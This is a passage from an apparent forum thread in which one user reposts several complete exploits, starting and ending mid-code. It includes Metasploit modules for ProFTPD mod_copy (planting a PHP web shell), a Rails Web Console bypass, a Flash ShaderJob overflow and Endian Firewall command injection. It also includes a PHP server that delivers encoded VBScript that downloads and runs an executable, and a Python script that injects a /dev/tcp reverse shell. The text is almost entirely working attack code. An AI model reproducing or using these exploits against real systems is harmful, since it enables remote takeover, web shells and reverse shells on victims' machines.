target['Option'] when 'mof' # Create MOF file data mof_name = rand_text_alpha(rand(6) + 1) + '.mof' mof_file = traversal(0) + 'Windows\\System32\\Wbem\\Mof\\' + mof_name mof_content = generate_mof(mof_name, exe_name) zip_add_file(zip, mof_file, mof_content) when 'profile' # Create .profile file bashrc_name = '.profile' bashrc_file = traversal(target['Depth']) + bashrc_name bashrc_content = "chmod a+x ./#{exe_name}\n./#{exe_name}" zip_add_file(zip, bashrc_file, bashrc_content) end # Write the final ZIP archive to a file zip_data = zip.pack file_create(zip_data) end # Add a file to the target zip and output a notification def zip_add_file(zip, filename, content) print_status("Adding '#{filename}' (#{content.length} bytes)"); zip.add_file(filename, content, nil, nil, nil) end end
  14. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution', 'Description' => %q{ This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination. The copy commands are executed with the rights of the ProFTPD service, which by default runs under the privileges of the 'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website directory, PHP remote code execution is made possible. }, 'Author' => [ 'Vadim Melihow', # Original discovery, Proof of Concept 'xistence <xistence[at]0x90.nl>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-3306' ], [ 'EDB', '36742' ] ], 'Privileged' => false, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'BadChars' => '', 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic gawk bash python perl' } }, 'Targets' => [ [ 'ProFTPD 1.3.5', { } ] ], 'DisclosureDate' => 'Apr 22 2015', 'DefaultTarget' => 0)) register_options( [ OptPort.new('RPORT', [true, 'HTTP port', 80]), OptPort.new('RPORT_FTP', [true, 'FTP port', 21]), OptString.new('TARGETURI', [true, 'Base path to the website', '/']), OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']), OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www']) ], self.class) end def check ftp_port = datastore['RPORT_FTP'] sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end sock.puts("SITE CPFR /etc/passwd\r\n") res = sock.get_once(-1, 10) if res && res.include?('350') Exploit::CheckCode::Vulnerable else Exploit::CheckCode::Safe end end def exploit ftp_port = datastore['RPORT_FTP'] get_arg = rand_text_alphanumeric(5+rand(3)) payload_name = rand_text_alphanumeric(5+rand(3)) + '.php' sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port) if sock.nil? fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server") else print_status("#{rhost}:#{ftp_port} - Connected to FTP server") end res = sock.get_once(-1, 10) unless res && res.include?('220') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner") end print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server") sock.puts("SITE CPFR /proc/self/cmdline\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline") end sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file") end sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n") res = sock.get_once(-1, 10) unless res && res.include?('350') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file") end sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n") res = sock.get_once(-1, 10) unless res && res.include?('250') fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying PHP payload to website path, directory not writable?") end sock.close print_status("#{peer} - Executing PHP payload #{target_uri.path}#{payload_name}") res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, payload_name), 'method' => 'GET', 'vars_get' => { get_arg => "nohup #{payload.encoded} &" } ) unless res && res.code == 200 fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure executing payload") end end end
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution', 'Description' => %q{ This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range. }, 'Author' => [ 'joernchen <joernchen[at]phenoelit.de>', # Discovery & disclosure 'Ben Murphy <benmmurphy@gmail.com>', # Discovery & disclosure 'hdm' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-3224' ], [ 'URL', 'http://openwall.com/lists/oss-security/2015/06/16/18' ], [ 'URL', 'https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ' ], [ 'URL', 'https://hackerone.com/reports/44513' ] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DefaultOptions' => { 'PrependFork' => true }, 'DisclosureDate' => 'Jun 16 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(3000), OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ]) ], self.class) end # # Identify the web console path and session ID, then inject code with it # def exploit res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'GET', 'headers' => { 'X-Forwarded-For' => '0000::1' } }, 25) unless res print_error("Error: No response requesting #{datastore['TARGETURI']}") return end web_console_path = nil # Support vulnerable Web Console versions if res.body.to_s =~ /data-remote-path='([^']+)'/ web_console_path = "/" + $1 end # Support newer Web Console versions if web_console_path.nil? && res.body.to_s =~ /data-mount-point='([^']+)'/ web_console_mount = $1 unless res.body.to_s =~ /data-session-id='([^']+)'/ print_error("Error: No session id found requesting #{datastore['TARGETURI']}") return end web_console_path = normalize_uri(web_console_mount, 'repl_sessions', $1) end unless web_console_path if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump') print_error('Error: The web console is patched, disabled, or you are not in the whitelisted scope') else print_error("Error: No web console path found when requesting #{datastore['TARGETURI']}") end return end print_status("Sending payload to #{web_console_path}") res = send_request_cgi({ 'uri' => web_console_path, 'method' => 'PUT', 'headers' => { 'X-Forwarded-For' => '0000::1', 'Accept' => 'application/vnd.web-console.v2', 'X-Requested-With' => 'XMLHttpRequest' }, 'vars_post' => { 'input' => payload.encoded } }, 25) end end
  16. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169. * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Evans', # Vulnerability discovery 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-3090'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'], ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'], ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'May 12 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end
  17. mohammad_ghazei

    Hacking

    #!/usr/bin/php <?php # Title : Havij OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : ITSecTeam # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # OleAut32.dll Exploit MS14-064 CVE2014-6332 # # # 1 . run php code : php havij.php # 2 . open "Havij" and Enter your exploit link http://ipaddress:80/ # 3 . go to "Setting" and Click "Load Cookie" # 4 . Your Link Download/Execute on your target # 5 . Finished ;) #Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY $port=80; # Port Address $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n"; $msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11 bGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj cmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl bGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy ZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG SUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh dGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl cnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1 bmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg YWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg IHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt eWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4 dAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w KSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv LCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu Zm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1 bmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p dCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp JmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm Y2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw MCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50 LndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg ICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg ICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K IApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy ZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp b24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD cmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg ICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm dW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u IEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg UHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo MCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo Mik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g IFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt b2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt KGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv ICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo ZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg ICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg ICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg Zm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2 NzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog ICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl cj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK ICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog ICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg IElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u PDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg ICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9 bWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu ICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg ICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK ICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg ICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK ICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg ICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0 eXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK ICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg ICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92 ZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg ICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp bSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu Y3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg IGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg IAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv bgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg=='; $msgd=base64_decode($msg); $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for (;;) { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
  18. mohammad_ghazei

    Hacking

    #!/usr/bin/env python # Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi) # OS Command Injection Exploit POC (Reverse TCP Shell) # Ben Lincoln, 2015-06-28 # http://www.beneaththewaves.net/ # Requires knowledge of a valid proxy username and password on the target Endian Firewall import httplib import sys proxyUserPasswordChangeURI = "/cgi-bin/chpasswd.cgi" def main(): if len(sys.argv) < 7: print "Endian Firewall Proxy User Password Change (/cgi-bin/chpasswd.cgi) Exploit\r\n" print "Usage: " + sys.argv[0] + " [TARGET_SYSTEM_IP] [TARGET_SYSTEM_WEB_PORT] [PROXY_USER_NAME] [PROXY_USER_PASSWORD] [REVERSE_SHELL_IP] [REVERSE_SHELL_PORT]\r\n" print "Example: " + sys.argv[0] + " 172.16.97.1 10443 proxyuser password123 172.16.97.17 443\r\n" print "Be sure you've started a TCP listener on the specified IP and port to receive the reverse shell when it connects.\r\n" print "E.g. ncat -nvlp 443" sys.exit(1) multipartDelimiter = "---------------------------334002631541493081770656718" targetIP = sys.argv[1] targetPort = sys.argv[2] userName = sys.argv[3] password = sys.argv[4] reverseShellIP = sys.argv[5] reverseShellPort = sys.argv[6] exploitString = password + "; /bin/bash -c /bin/bash -i >& /dev/tcp/" + reverseShellIP + "/" + reverseShellPort + " 0>&1;" endianURL = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI conn = httplib.HTTPSConnection(targetIP, targetPort) headers = {} headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0" headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" headers["Accept-Encoding"] = "" headers["Referer"] = "https://" + targetIP + ":" + targetPort + proxyUserPasswordChangeURI headers["Content-Type"] = "multipart/form-data; boundary=" + multipartDelimiter headers["Accept-Language"] = "en-US,en;q=0.5" headers["Connection"] = "keep-alive" multipartDelimiter = "--" + multipartDelimiter body = multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n" body = body + "change\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n" body = body + userName + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n" body = body + password + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n" body = body + exploitString + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n" body = body + exploitString + "\r\n" body = body + multipartDelimiter + "\r\n" body = body + "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n" body = body + " Change password\r\n" body = body + multipartDelimiter + "--" + "\r\n" conn.request("POST", proxyUserPasswordChangeURI, body, headers) response = conn.getresponse() print "HTTP " + str(response.status) + " " + response.reason + "\r\n" print response.read() print "\r\n\r\n" if __name__ == "__main__": main()
  19. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, 'Name' => 'Endian Firewall < 3.0.0 Proxy Password Change Command Injection', 'Description' => %q{ This module exploits an OS command injection vulnerability in a web-accessible CGI script used to change passwords for locally-defined proxy user accounts. Valid credentials for such an account are required. Command execution will be in the context of the "nobody" account, but on versions of EFW I tested, this account had broad sudo permissions, including to run the script /usr/local/bin/chrootpasswd as root. This script changes the password for the Linux root account on the system to the value specified by console input once it is executed. The password for the proxy user account specified will *not* be changed by the use of this module, as long as the target system is vulnerable to the exploit. Very early versions of Endian Firewall (e.g. 1.1 RC5) require HTTP basic auth credentials as well to exploit this vulnerability. Use the standard USERNAME and PASSWORD advanced options to specify these values if required. Versions >= 3.0.0 still contain the vulnerable code, but it appears to never be executed due to a bug in the vulnerable CGI script which also prevents normal use. Tested successfully against the following versions of EFW Community: 1.1 RC5, 2.0, 2.1, 2.5.1, 2.5.2. Used Apache mod_cgi Bash Environment Variable Code Injection and Novell ZENworks Configuration Management Remote Execution modules as templates. }, 'Author' => [ 'Ben Lincoln' # Vulnerability discovery, exploit, Metasploit module ], 'References' => [ # ['CVE', ''], # ['OSVDB', ''], # ['EDB', ''], ['URL', 'http://jira.endian.com/browse/COMMUNITY-136'] ], 'Privileged' => false, 'Platform' => %w{ linux }, 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'Space' => 2048 }, 'Targets' => [ [ 'Linux x86', { 'Platform' => 'linux', 'Arch' => ARCH_X86, 'CmdStagerFlavor' => [ :echo, :printf ] } ], [ 'Linux x86_64', { 'Platform' => 'linux', 'Arch' => ARCH_X86_64, 'CmdStagerFlavor' => [ :echo, :printf ] } ] ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 10443 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2015', 'License' => MSF_LICENSE )) register_options([ OptString.new('TARGETURI', [true, 'Path to chpasswd.cgi CGI script', '/cgi-bin/chpasswd.cgi']), OptString.new('EFW_USERNAME', [true, 'Valid proxy account username for the target system']), OptString.new('EFW_PASSWORD', [true, 'Valid password for the proxy user account']), OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 200]), OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']), OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 10]) ], self.class) end def exploit # Cannot use generic/shell_reverse_tcp inside an elf # Checking before proceeds if generate_payload_exe.blank? fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, " + "please select a native payload") end execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true) end def execute_command(cmd, opts) cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod") req(cmd) end def req(cmd) sploit = "#{datastore['EFW_PASSWORD']}; #{cmd};" boundary = "----#{rand_text_alpha(34)}" data = "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"ACTION\"\r\n\r\n" data << "change\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n" data << "#{datastore['EFW_USERNAME']}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n" data << "#{datastore['EFW_PASSWORD']}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n" data << "#{sploit}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n" data << "#{sploit}\r\n" data << "--#{boundary}\r\n" data << "Content-Disposition: form-data; 